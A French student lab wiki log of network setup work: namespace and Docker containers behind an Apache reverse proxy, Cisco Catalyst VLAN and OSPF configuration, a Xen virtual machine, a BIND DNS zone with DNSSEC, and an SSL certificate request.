&lt;br /&gt;
  unshare -n -u -p -f -m chroot /tmp/JDQB_DISKX /bin/sh -c &amp;quot;mount /proc ; /bin/bash&amp;quot; ;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Dans chaque conteneur &lt;br /&gt;
&lt;br /&gt;
  ip l set eth0 up&lt;br /&gt;
Cette commande s'applique aussi à eth1 pour le conteneur 1&lt;br /&gt;
&lt;br /&gt;
==Mise en place commutateur virtuel==&lt;br /&gt;
Création des interfaces liées&lt;br /&gt;
&lt;br /&gt;
iface_virt_X (interface virtuelle X) &amp;lt;-&amp;gt; iface_ns_X (interface namespace X)&lt;br /&gt;
&lt;br /&gt;
  ip link add iface_virt_1 type veth peer name iface_ns_1&lt;br /&gt;
  ip link add iface_virt_2 type veth peer name iface_ns_2&lt;br /&gt;
  ip link add iface_virt_3 type veth peer name iface_ns_3&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Création de notre propre pont&lt;br /&gt;
&lt;br /&gt;
  ip link add jdqb_bridge type bridge&lt;br /&gt;
&lt;br /&gt;
Ajout des parties des interfaces dans le commutateur&lt;br /&gt;
&lt;br /&gt;
  ip link set iface_virt_1 master jdqb_bridge&lt;br /&gt;
  ip link set iface_virt_2 master jdqb_bridge&lt;br /&gt;
  ip link set iface_virt_3 master jdqb_bridge&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Activation des interfaces&lt;br /&gt;
  ip link set iface_virt_1 up&lt;br /&gt;
  ip link set iface_virt_2 up &lt;br /&gt;
  ip link set iface_virt_3 up  &lt;br /&gt;
&lt;br /&gt;
Activation du pont&lt;br /&gt;
  ip address add dev jdqb_bridge 192.168.0.1/24&lt;br /&gt;
&lt;br /&gt;
Montée du pont&lt;br /&gt;
  ip link set jdqb_bridge up&lt;br /&gt;
&lt;br /&gt;
Connexion des conteneurs à leur interface virtuelle respective&lt;br /&gt;
  ip link set iface_ns_1 netns /proc/&amp;lt;PID1&amp;gt;/ns/net name eth0&lt;br /&gt;
  ip link set iface_ns_2 netns /proc/&amp;lt;PID2&amp;gt;/ns/net name eth0&lt;br /&gt;
  ip link set iface_ns_3 netns /proc/&amp;lt;PID3&amp;gt;/ns/net name eth0&lt;br /&gt;
&lt;br /&gt;
Obtention des PIDs&lt;br /&gt;
  ps aux | grep unshare&lt;br /&gt;
&lt;br /&gt;
Quatrième interface, reliant le mandataire web inverse (conteneur 1) et le bridge de zabeth09&lt;br /&gt;
  ip link add iface_virt_0 type veth peer name iface_ns_0&lt;br /&gt;
  ip link set iface_virt_0 master bridge&lt;br /&gt;
  ip link set iface_virt_0 up&lt;br /&gt;
  ip link set iface_ns_0 netns /proc/&amp;lt;PID1&amp;gt;/ns/net name eth1&lt;br /&gt;
&lt;br /&gt;
==Modification de la table IP==&lt;br /&gt;
&lt;br /&gt;
  iptables -F&lt;br /&gt;
  iptables -F -t nat&lt;br /&gt;
  iptables -P FORWARD ACCEPT&lt;br /&gt;
&lt;br /&gt;
Attribution des adresses aux conteneurs&lt;br /&gt;
&lt;br /&gt;
  nsenter -t &amp;lt;PID1&amp;gt; -n ip address add dev eth0 192.168.0.91/24&lt;br /&gt;
  nsenter -t &amp;lt;PID2&amp;gt; -n ip address add dev eth0 192.168.0.92/24&lt;br /&gt;
  nsenter -t &amp;lt;PID3&amp;gt; -n ip address add dev eth0 192.168.0.93/24&lt;br /&gt;
&lt;br /&gt;
  nsenter -t &amp;lt;PID1&amp;gt; -n ip address add dev eth1 172.26.145.90/24&lt;br /&gt;
&lt;br /&gt;
==Mandataire inverse==&lt;br /&gt;
===Configuration Apache2===&lt;br /&gt;
&lt;br /&gt;
Afin de configurer notre premier conteneur en mandataire inverse, nous modifions le fichier : /etc/apache2/sites-available/000-default.conf&lt;br /&gt;
&lt;br /&gt;
Nous ajoutons : &lt;br /&gt;
  &amp;lt;VirtualHost *:80&amp;gt;&lt;br /&gt;
  ...  &lt;br /&gt;
  ProxyPass /site1 http://192.168.0.92/&lt;br /&gt;
  ProxyPassReverse /site1 http://192.168.0.92/&lt;br /&gt;
  ProxyPass /site2 http://192.168.0.93/&lt;br /&gt;
  ProxyPassReverse /site2 http://192.168.0.93/&lt;br /&gt;
  ProxyRequests Off&lt;br /&gt;
  ...&lt;br /&gt;
  &amp;lt;/VirtualHost&amp;gt;&lt;br /&gt;
&lt;br /&gt;
===Configuration réseau===&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Ajout de la route par défaut (Polytech) : &lt;br /&gt;
  ip route add default via 172.26.145.254&lt;br /&gt;
&lt;br /&gt;
Configuration eth1 : &lt;br /&gt;
  ip add add dev eth1 172.26.145.90/24&lt;br /&gt;
  ip link set eth1 up&lt;br /&gt;
&lt;br /&gt;
11h25 =&amp;gt; Serveurs Web unshare OK&lt;br /&gt;
 &lt;br /&gt;
=Création des conteneurs via Docker=&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==Instructions''Texte italique''==&lt;br /&gt;
docker run -i -t debian&lt;br /&gt;
&lt;br /&gt;
export http&lt;br /&gt;
&lt;br /&gt;
apt-get install apache nano vi&lt;br /&gt;
&lt;br /&gt;
En dehors conteneur docker commit &amp;lt;image name&amp;gt; sur le conteneur&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Creer réseau privé docker network create&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
(2X)docker run -i -t &amp;lt;image name&amp;gt; --net nom réseau&lt;br /&gt;
docker run -i -t &amp;lt;image name&amp;gt; --net nom réseau -p 80:80&lt;br /&gt;
&lt;br /&gt;
DNS : vérifier les @IP des conteneurs&lt;br /&gt;
LE mandataire inverse doit avoir @IP de zabeth&lt;br /&gt;
&lt;br /&gt;
==Procédure==&lt;br /&gt;
Modification des paramètres de docker dans /etc/default/docker, commenter la ligne DOCKER_EPTS=&amp;quot;--iptables=false&amp;quot;&lt;br /&gt;
&lt;br /&gt;
  iptables-save&lt;br /&gt;
  service docker restart&lt;br /&gt;
&lt;br /&gt;
  docker run -i -t debian /bin/bash&lt;br /&gt;
&lt;br /&gt;
Dans le conteneur&lt;br /&gt;
  export http_proxy&lt;br /&gt;
  export https_proxy&lt;br /&gt;
&lt;br /&gt;
  apt-get update&lt;br /&gt;
  apt-get install apache2 nano vim&lt;br /&gt;
&lt;br /&gt;
Récupération ID du docker&lt;br /&gt;
  docker ps&lt;br /&gt;
&lt;br /&gt;
Commit sur le docker&lt;br /&gt;
  docker commit &amp;lt;ID&amp;gt; apache2&lt;br /&gt;
&lt;br /&gt;
Création du network&lt;br /&gt;
  docker network create jdqb_network&lt;br /&gt;
&lt;br /&gt;
Lancement des conteneurs&lt;br /&gt;
  docker run -i -t --net jdqb_network apache2 &lt;br /&gt;
  docker run -i -t --net jdqb_network apache2&lt;br /&gt;
  docker run -i -t --net jdqb_network -p 80:80 apache2&lt;br /&gt;
&lt;br /&gt;
Dans chaque conteneur &lt;br /&gt;
  ip a&lt;br /&gt;
&lt;br /&gt;
Dans le conteneur mandataire&lt;br /&gt;
  nano /etc/apache2/sites-enabled/000-default.conf&lt;br /&gt;
&lt;br /&gt;
Ajout des proxypass&lt;br /&gt;
&lt;br /&gt;
  ProxyPass /site1 http://&amp;lt;IP conteneur 1&amp;gt;/&lt;br /&gt;
  ProxyPassReverse /site1 http://&amp;lt;IP conteneur 1&amp;gt;/&lt;br /&gt;
  ProxyPass /site2 http://&amp;lt;IP conteneur 2&amp;gt;/&lt;br /&gt;
  ProxyPassReverse /site2 http://&amp;lt;IP conteneur 2&amp;gt;/&lt;br /&gt;
  ProxyRequests Off&lt;br /&gt;
&lt;br /&gt;
Ajout d'un DNS dans GANDI @plil.space&lt;br /&gt;
&lt;br /&gt;
Type A , TTL 1800, nom jdqb-docker, &amp;lt;ip bridge zabeth&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Sur les trois conteneurs&lt;br /&gt;
  service apache2 restart&lt;br /&gt;
&lt;br /&gt;
10h20 Serveurs Web (docker) OK&lt;br /&gt;
&lt;br /&gt;
=TP PRA - Mise en place du routeur Catalyst 3650=&lt;br /&gt;
&lt;br /&gt;
* Sujet : [https://rex.plil.fr/Enseignement/Reseau/Protocoles.IMA5sc/reseau.html Lien - rex.plil.fr]&lt;br /&gt;
&lt;br /&gt;
== Déroulement des Séances ==&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
===Séance 1 : 26/11/2018===&lt;br /&gt;
&lt;br /&gt;
Nous avons à notre disposition l'adresse IPV4 routée 193.48.57.160/27.&lt;br /&gt;
&lt;br /&gt;
Nous disposons également de l'adresse IPV4 non routée 10.60.0.0/16.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
====Découpage réseau IPV4 routé en deux sous réseaux====&lt;br /&gt;
&lt;br /&gt;
Nous divisons l'IPV4 routée en deux sous réseaux.&lt;br /&gt;
&lt;br /&gt;
Pour réaliser leur TP, les IMA2A5 ont utilisés les adresses comprises entre 193.48.57.160/28 et 193.48.57.175/28.&lt;br /&gt;
&lt;br /&gt;
Nous utiliserons donc le second sous réseau : 193.48.57.176/28 à 193.48.57.191/28.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Par conséquent l'adresse IP du routeur 1 est 193.48.57.188/28&lt;br /&gt;
&lt;br /&gt;
Celle du routeur 2 est 193.48.57.189/28&lt;br /&gt;
&lt;br /&gt;
Et enfin le routeur virtuel, pour la diffusion entre routeurs, est 193.48.57.190/28&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
====Découpage du réseau IPV4 non routée en sous réseaux====&lt;br /&gt;
&lt;br /&gt;
Nous découpons notre réseau en 254 sous réseaux disponibles. Les IMA2A5 ont utilisés les 5 premiers 10.60.1.0/24 à 10.60.5.0/24 .&lt;br /&gt;
&lt;br /&gt;
Nous prendrons donc les adresses entre 10.60.11.0/24 et 10.60.21.0/24 .&lt;br /&gt;
&lt;br /&gt;
Ces adresses seront routées vers les adresses comprises entre 193.48.57.177/28 et 193.48.57.187/28 .&lt;br /&gt;
&lt;br /&gt;
===Séance 2 : 27/11/2018===&lt;br /&gt;
&lt;br /&gt;
Configuration du routeur Catalyst 3560&lt;br /&gt;
&lt;br /&gt;
====Mise en place du routeur et connexion à celui ci====&lt;br /&gt;
La configuration du routeur se fera via minicom.&lt;br /&gt;
&lt;br /&gt;
Vérification de l'interface à utiliser :&lt;br /&gt;
&lt;br /&gt;
  ls /dev/ | grep ttyUSB&lt;br /&gt;
&lt;br /&gt;
Notre routeur est connecté sur ttyUSB0.&lt;br /&gt;
&lt;br /&gt;
  minicom -os&lt;br /&gt;
&lt;br /&gt;
Les paramètres de configuration de minicom sont les suivants : &lt;br /&gt;
&lt;br /&gt;
- port /dev/ttyUSB0&lt;br /&gt;
&lt;br /&gt;
- baud 9600&lt;br /&gt;
&lt;br /&gt;
- 8 bits&lt;br /&gt;
&lt;br /&gt;
- pas de bit de parité&lt;br /&gt;
&lt;br /&gt;
- 1 bit de stop&lt;br /&gt;
&lt;br /&gt;
- pas de contrôle de flux&lt;br /&gt;
&lt;br /&gt;
====Configuration du routeur : Configuration des ports====&lt;br /&gt;
Passage en administrateur :&lt;br /&gt;
&lt;br /&gt;
  Router&amp;gt;enable&lt;br /&gt;
  Router#&lt;br /&gt;
&lt;br /&gt;
On liste les interfaces&lt;br /&gt;
&lt;br /&gt;
  Router#show interface status&lt;br /&gt;
  &lt;br /&gt;
  &lt;br /&gt;
  Port      Name               Status       Vlan       Duplex    Speed   Type&lt;br /&gt;
  Gi0/1                        connected    Trunk      a-full    a-100   10/100/1000BaseTX      // vers le commutateur 1&lt;br /&gt;
  Gi0/2                        connected    Trunk      a-full    a-100   10/100/1000BaseTX      // vers le commutateur 1&lt;br /&gt;
  Gi0/3                        connected    Trunk      a-full    a-100   10/100/1000BaseTX      // vers le commutateur 1&lt;br /&gt;
  Gi0/4                        connected    Trunk      a-full    a-100   10/100/1000BaseTX      // vers le commutateur 1&lt;br /&gt;
  Gi0/5                        connected    Trunk      a-full    a-100   10/100/1000BaseTX      // vers le commutateur 1&lt;br /&gt;
  Gi0/6                        connected    Trunk      a-full    a-100   10/100/1000BaseTX      // vers le commutateur 1&lt;br /&gt;
  Gi0/7                        connected    Trunk      a-full    a-100   10/100/1000BaseTX      // vers le commutateur 1&lt;br /&gt;
  Gi0/8                        connected    Trunk      a-full    a-100   10/100/1000BaseTX      // vers le commutateur 1&lt;br /&gt;
  Gi0/9                        connected    Trunk      a-full    a-100   10/100/1000BaseTX      // vers le commutateur 1&lt;br /&gt;
  Gi0/10                       connected    Trunk      a-full    a-100   10/100/1000BaseTX      // vers le commutateur 1&lt;br /&gt;
  &lt;br /&gt;
  Gi0/11                       connected    Trunk      a-full    a-100   10/100/1000BaseTX      // vers le commutateur 2 (en E306)&lt;br /&gt;
  &lt;br /&gt;
  // Non connecté&lt;br /&gt;
  [...interfaces Gi0/12-Gi0/48]&lt;br /&gt;
  &lt;br /&gt;
  // les fibres&lt;br /&gt;
  Te0/1                        notconnect   1          full      10G     10GBase-SR             // vers le local SR52&lt;br /&gt;
  Te0/2                        notconnect   1          full      10G     10GBase-SR             // vers cordouan&lt;br /&gt;
&lt;br /&gt;
Afin d'accélérer la communication entre le routeur et le commutateur, les ports 1 à 10 du routeur seront connectés au commutateur. &lt;br /&gt;
&lt;br /&gt;
  Router(config)#configure terminal&lt;br /&gt;
  Enter configuration commands, one per line.  End with CNTL/Z.&lt;br /&gt;
  Router(config)#interface range Gi0/1 - 11&lt;br /&gt;
  Switch(config-if)#switchport mode access&lt;br /&gt;
  Switch(config-if)#switchport access access trunk                                       &lt;br /&gt;
  Switch(config-if)#exit&lt;br /&gt;
&lt;br /&gt;
Configuration de l'interface 10G vers le local SR52&lt;br /&gt;
  &lt;br /&gt;
  Router(config)#configure terminal&lt;br /&gt;
  Enter configuration commands, one per line.  End with CNTL/Z.&lt;br /&gt;
  Router(config)#interface Te0/1&lt;br /&gt;
  Switch(config-if)#switchport mode access&lt;br /&gt;
  Switch(config-if)#switchport access access vlan 131                                       // vlan 131 (interconnexion IMA5)&lt;br /&gt;
  Switch(config-if)#exit&lt;br /&gt;
&lt;br /&gt;
Configuration de l'interface 10G vers Cordouan&lt;br /&gt;
  &lt;br /&gt;
  Router(config)#configure terminal&lt;br /&gt;
  Enter configuration commands, one per line.  End with CNTL/Z.&lt;br /&gt;
  Router(config)#interface Te0/2&lt;br /&gt;
  Switch(config-if)#switchport mode access&lt;br /&gt;
  Switch(config-if)#switchport access access vlan 43                                       // vlan 43 (XEN IMA5)&lt;br /&gt;
  Switch(config-if)#exit&lt;br /&gt;
&lt;br /&gt;
PROBLEME : &lt;br /&gt;
&lt;br /&gt;
  *Mar  1 01:42:30.518: %CDP-4-NATIVE_VLAN_MISMATCH: Native VLAN mismatch discovered on TenGigabitEthernet0/2 (43), with Switch GigabitEthernet3/2 (42).&lt;br /&gt;
&lt;br /&gt;
A FAIRE : &lt;br /&gt;
&lt;br /&gt;
*configurer les interfaces / BDI&lt;br /&gt;
&lt;br /&gt;
====Mise en place de la machine virtuelle====&lt;br /&gt;
Notre machine virtuelle a les paramètres suivants : &lt;br /&gt;
&lt;br /&gt;
-Hostname = Dionysos&lt;br /&gt;
&lt;br /&gt;
-@IP = 193.48.57.178&lt;br /&gt;
&lt;br /&gt;
-Netmask = 255.255.255.240&lt;br /&gt;
&lt;br /&gt;
-dossier = /usr/local/xen&lt;br /&gt;
  &lt;br /&gt;
  xen-create-image --hostname=Dionysos --ip=193.48.57.178 --netmask=255.255.255.240 --dir=/usr/local/xen&lt;br /&gt;
&lt;br /&gt;
Dans le répertoire /etc/xen, nous modifions le fichier Dionysos.cfg. &lt;br /&gt;
&lt;br /&gt;
Nous adaptons le bridge StudentsInfo, qui devient IMA5sc.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Puis nous lançons une instance de la VM&lt;br /&gt;
&lt;br /&gt;
 xl create Dionysos.cfg&lt;br /&gt;
 xl console Dionysos&lt;br /&gt;
&lt;br /&gt;
Connexion à la VM, avec le login root, mot de passe fourni a la fin de l'installation &lt;br /&gt;
&lt;br /&gt;
Dans le fichier /etc/ssh/sshd_config nous décommentons la ligne : &lt;br /&gt;
  PermitRootLogin yes&lt;br /&gt;
&lt;br /&gt;
Ainsi nous pouvons nous connecter en ssh sur notre VM&lt;br /&gt;
&lt;br /&gt;
Pour que le système soit connecté dans /etc/network/interfaces nous ajoutons la gateway.&lt;br /&gt;
  gateway 193.48.57.190&lt;br /&gt;
&lt;br /&gt;
 ip route add default via 193.48.57.190 dev eth0 onlink&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Nous avons modifié le mot de passe initial.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Pour éteindre une VM&lt;br /&gt;
  &lt;br /&gt;
 xl shutdown Dionysos&lt;br /&gt;
&lt;br /&gt;
===Séance 3 : 10/12/2018===&lt;br /&gt;
&lt;br /&gt;
====Config Routeur 3560====&lt;br /&gt;
&lt;br /&gt;
*Commande pour save la configuration&lt;br /&gt;
&lt;br /&gt;
 write&lt;br /&gt;
&lt;br /&gt;
Correction sur la config du routeur&lt;br /&gt;
&lt;br /&gt;
*Vers le commutateur 4006 - 10 cables 1G (Notre Salle)&lt;br /&gt;
 &lt;br /&gt;
 enable&lt;br /&gt;
 conf t&lt;br /&gt;
 interface range Gi0/1 - 10&lt;br /&gt;
 switchport&lt;br /&gt;
 switchport trunk encapsulation dot1q&lt;br /&gt;
 switchport mode trunk&lt;br /&gt;
 exit&lt;br /&gt;
 &lt;br /&gt;
&lt;br /&gt;
*Vers le commutateur 6000 - 1 cable 1G (Autre Salle)&lt;br /&gt;
&lt;br /&gt;
 enable&lt;br /&gt;
 conf t&lt;br /&gt;
 interface gi0/11&lt;br /&gt;
 switchport&lt;br /&gt;
 switchport trunk encapsulation dot1q&lt;br /&gt;
 switchport mode trunk&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
*Vers Cordouan - cable 10G (Fibre)&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 interface Te0/2&lt;br /&gt;
 switchport trunk encapsulation dot1q&lt;br /&gt;
 switchport mode access&lt;br /&gt;
 switchport access vlan 43                                       // vlan 43 (XEN IMA5)&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
*Vers le local SR52&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 interface Te0/1&lt;br /&gt;
 switchport trunk encapsulation dot1q&lt;br /&gt;
 switchport mode access&lt;br /&gt;
 switchport access vlan 131                                       // vlan 131 (interconnexion IMA5)&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
*Le vlan M = 10 + N (Groupe N)&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 int vlanM&lt;br /&gt;
 ip address 10.60.M.252 255.255.255.0&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby M ip 10.60.M.254&lt;br /&gt;
 standby M preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address 2001:660:4401:60CN eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60CN::/64 1000 9000&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
*Le vlan 43 (IM5sc)&lt;br /&gt;
&lt;br /&gt;
 int vlan43&lt;br /&gt;
 ip address 193.48.57.188 255.255.255.240&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 22 ip 193.48.57.190&lt;br /&gt;
 standby 22 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address 2001:660:4401:60C0 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60C0::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
*Le vlan 131 (Interconnexion)&lt;br /&gt;
 &lt;br /&gt;
 int vlan 131&lt;br /&gt;
 ip address 192.168.222.9 255.255.255.248         &lt;br /&gt;
 ipv6 address fe80::2 link-local                  &lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 rip tpima2a5 enable                        &lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
*Nommer un VLANs&lt;br /&gt;
&lt;br /&gt;
 vlan M&lt;br /&gt;
 name groupeN&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
 vlan 43&lt;br /&gt;
 name Xen&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
 vlan 131&lt;br /&gt;
 name interconnexion&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 ip routing&lt;br /&gt;
 exit                &lt;br /&gt;
 show ip route      &lt;br /&gt;
 Codes: C - connected, S - static, R - RIP, M - mobile, B - BGP&lt;br /&gt;
        D - EIGRP, EX - EIGRP external, O - OSPF, IA - OSPF inter area &lt;br /&gt;
        N1 - OSPF NSSA external type 1, N2 - OSPF NSSA external type 2&lt;br /&gt;
        E1 - OSPF external type 1, E2 - OSPF external type 2&lt;br /&gt;
        i - IS-IS, su - IS-IS summary, L1 - IS-IS level-1, L2 - IS-IS level-2&lt;br /&gt;
        ia - IS-IS inter area, * - candidate default, U - per-user static route&lt;br /&gt;
        o - ODR, P - periodic downloaded static route&lt;br /&gt;
 &lt;br /&gt;
 Gateway of last resort is not set&lt;br /&gt;
 &lt;br /&gt;
      193.48.57.0/28 is subnetted, 1 subnets&lt;br /&gt;
 C       193.48.57.176 is directly connected, Vlan43&lt;br /&gt;
      10.0.0.0/24 is subnetted, 11 subnets&lt;br /&gt;
 C       10.60.20.0 is directly connected, Vlan20&lt;br /&gt;
 C       10.60.21.0 is directly connected, Vlan21&lt;br /&gt;
 C       10.60.18.0 is directly connected, Vlan18&lt;br /&gt;
 C       10.60.19.0 is directly connected, Vlan19&lt;br /&gt;
 C       10.60.16.0 is directly connected, Vlan16&lt;br /&gt;
 C       10.60.17.0 is directly connected, Vlan17&lt;br /&gt;
 C       10.60.14.0 is directly connected, Vlan14&lt;br /&gt;
 C       10.60.15.0 is directly connected, Vlan15&lt;br /&gt;
 C       10.60.12.0 is directly connected, Vlan12&lt;br /&gt;
 C       10.60.13.0 is directly connected, Vlan13&lt;br /&gt;
 C       10.60.11.0 is directly connected, Vlan11&lt;br /&gt;
      192.168.222.0/29 is subnetted, 1 subnets&lt;br /&gt;
 C       192.168.222.8 is directly connected, Vlan131&lt;br /&gt;
&lt;br /&gt;
* OSPF&lt;br /&gt;
&lt;br /&gt;
 Switch(config)#router ospf 1        &lt;br /&gt;
 Switch(config-router)#router-id 10.60.11.252 &lt;br /&gt;
 Switch(config-router)#summary-address 193.48.57.176 255.255.255.240&lt;br /&gt;
 Switch(config-router)#redistribute connected subnets &lt;br /&gt;
 Switch(config-router)#summary-address 192.168.0.0 255.255.255.0 not-advertise&lt;br /&gt;
 Switch(config-router)#summary-address 10.60.0.0 255.255.0.0 not-advertise    &lt;br /&gt;
 Switch(config-router)#network 192.168.222.8 0.0.0.7 area 2&lt;br /&gt;
 Switch(config-router)#exit&lt;br /&gt;
&lt;br /&gt;
====Mise en place des partitions pour la VM====&lt;br /&gt;
Sur cordouan&lt;br /&gt;
&lt;br /&gt;
  lvcreate -L10G -nIMA5_Dionysos_var virtual&lt;br /&gt;
  lvcreate -L10G -nIMA5_Dionysos_home virtual&lt;br /&gt;
  &lt;br /&gt;
  &lt;br /&gt;
  mke2fs /dev/virtual/IMA5_Dionysos_var&lt;br /&gt;
  mke2fs /dev/virtual/IMA5_Dionysos_home&lt;br /&gt;
&lt;br /&gt;
Dans le fichier /etc/xen/Dionysos.cfg&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 disk        = [&lt;br /&gt;
                  'file:/usr/local/xen/domains/Dionysos/disk.img,xvda2,w',&lt;br /&gt;
                  'file:/usr/local/xen/domains/Dionysos/swap.img,xvda1,w&lt;br /&gt;
                  'phy:/dev/virtual/IMA5_Dionysos_var,xvdb2,w',&lt;br /&gt;
                  'phy:/dev/virtual/IMA5_Dionysos_home,xvdb1,w',&lt;br /&gt;
               ]&lt;br /&gt;
&lt;br /&gt;
Sur la VM, dans le fichier /etc/fstab&lt;br /&gt;
  /dev/xvdb1 /home ext4 defaults 0 3&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Le cas du répertoire /var est plus complexe. &lt;br /&gt;
&lt;br /&gt;
Si nous utilisons la même méthode que pour /home, nous perdrons le /var. Nous ne pourrions donc plus utiliser apt-get, par exemple.&lt;br /&gt;
&lt;br /&gt;
Dans la VM, dans le fichier /etc/fstab&lt;br /&gt;
  /dev/xvdb2 /mnt ext4 defaults 0 2&lt;br /&gt;
&lt;br /&gt;
Puis dans le terminal de la VM&lt;br /&gt;
  mount /dev/xvdb2 /mnt &lt;br /&gt;
  mv /var/* /mnt/&lt;br /&gt;
  unmount /mnt&lt;br /&gt;
  mount -a&lt;br /&gt;
&lt;br /&gt;
Via la commande df nous contrôlons le résultat.&lt;br /&gt;
   Filesystem     1K-blocks    Used Available Use% Mounted on&lt;br /&gt;
   ...                  ...     ...       ...  ... ...&lt;br /&gt;
   /dev/xvdb1      10255636   36888   9678076   1% /home&lt;br /&gt;
   /dev/xvdb2      10321208   23028   9773892   1% /var&lt;br /&gt;
&lt;br /&gt;
====Mise en place serveur DNS====&lt;br /&gt;
Utilisation de la méthode bind&lt;br /&gt;
&lt;br /&gt;
Dans le répertoire /etc/bind, nous modifirons les trois fichiers suivants :&lt;br /&gt;
&lt;br /&gt;
named.conf.options&lt;br /&gt;
&lt;br /&gt;
  options {&lt;br /&gt;
        directory &amp;quot;/var/cache/bind&amp;quot;;&lt;br /&gt;
  &lt;br /&gt;
        // If there is a firewall between you and nameservers you want&lt;br /&gt;
        // to talk to, you may need to fix the firewall to allow multiple&lt;br /&gt;
        // ports to talk.  See http://www.kb.cert.org/vuls/id/800113&lt;br /&gt;
  &lt;br /&gt;
        // If your ISP provided one or more IP addresses for stable&lt;br /&gt;
        // nameservers, you probably want to use them as forwarders.&lt;br /&gt;
        // Uncomment the following block, and insert the addresses replacing&lt;br /&gt;
        // the all-0's placeholder.&lt;br /&gt;
  &lt;br /&gt;
        // forwarders {&lt;br /&gt;
        //   0.0.0.0;&lt;br /&gt;
        // };&lt;br /&gt;
  &lt;br /&gt;
        //========================================================================&lt;br /&gt;
        // If BIND logs error messages about the root key being expired,&lt;br /&gt;
        // you will need to update your keys.  See https://www.isc.org/bind-keys&lt;br /&gt;
        //========================================================================&lt;br /&gt;
  &lt;br /&gt;
        //Mise en place du DNSSEC&lt;br /&gt;
        dnssec-enable yes;&lt;br /&gt;
  &lt;br /&gt;
        dnssec-validation auto;&lt;br /&gt;
  &lt;br /&gt;
        auth-nxdomain no;&lt;br /&gt;
        listen-on-v6 { any; };&lt;br /&gt;
        allow-recursion{localhost;};&lt;br /&gt;
  };&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
named.conf.local&lt;br /&gt;
&lt;br /&gt;
  zone &amp;quot;dionysos.space&amp;quot;{&lt;br /&gt;
        type master;&lt;br /&gt;
        file &amp;quot;/etc/bind/db.dionysos.space&amp;quot;;&lt;br /&gt;
        allow-transfer{217.70.177.40;}; //Autorisation transfert vers ns6.gandi.net&lt;br /&gt;
  };&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Puis nous créons le fichier /etc/bind/db.dionysos.space&lt;br /&gt;
  cp db.local db.dionysos.space &lt;br /&gt;
&lt;br /&gt;
Dans ce fichier nous entrons les paramètres suivants&lt;br /&gt;
&lt;br /&gt;
  ;&lt;br /&gt;
  ; BIND data file for local loopback interface&lt;br /&gt;
  ;&lt;br /&gt;
  $TTL    604800&lt;br /&gt;
  $include /root/SSL_certif/dionysos-ksk.key&lt;br /&gt;
  $include /root/SSL_certif/dionysos-zsk.key&lt;br /&gt;
  &lt;br /&gt;
  @       IN      SOA     ns.dionysos.space. root.dionysos.space (&lt;br /&gt;
                                2         ; Serial&lt;br /&gt;
                           604800         ; Refresh&lt;br /&gt;
                            86400         ; Retry&lt;br /&gt;
                          2419200         ; Expire&lt;br /&gt;
                           604800 )       ; Negative Cache TTL&lt;br /&gt;
  ;&lt;br /&gt;
          IN      NS      ns.dionysos.space. ;dns principal&lt;br /&gt;
          IN      NS      ns6.gandi.net.     ;dns secondaire&lt;br /&gt;
  @       IN      A       193.48.57.178      ;acces sans le &amp;quot;www.&amp;quot;&lt;br /&gt;
  ns      IN      NS      193.48.57.178      ;acces avec http https&lt;br /&gt;
  www     IN      A       193.48.57.178;     ;acces avec le &amp;quot;www.&lt;br /&gt;
&lt;br /&gt;
====Certificat SSL====&lt;br /&gt;
  &lt;br /&gt;
 &lt;br /&gt;
&lt;br /&gt;
  openssl req -nodes -newkey rsa:2048 -sha1 -keyout dionysos.space.key -out dionysos.space.csr&lt;br /&gt;
  ...&lt;br /&gt;
  Common Name (e.g. server FQDN or YOUR name) []:dionysos.space et dionysos.space.key&lt;br /&gt;
  Email Address []:qboens@polytech-lille.net&lt;br /&gt;
&lt;br /&gt;
Cette opération génére deux fichiers : dionysos.space.crt et dionysos.space.key&lt;br /&gt;
&lt;br /&gt;
Une fois cette étape faite on récupére sur gandi GandiStandardSSLCA2.pem, dans l'onglet du certificat.&lt;br /&gt;
&lt;br /&gt;
Tous les fichiers sont placés dans le répertoire SSL_certif&lt;br /&gt;
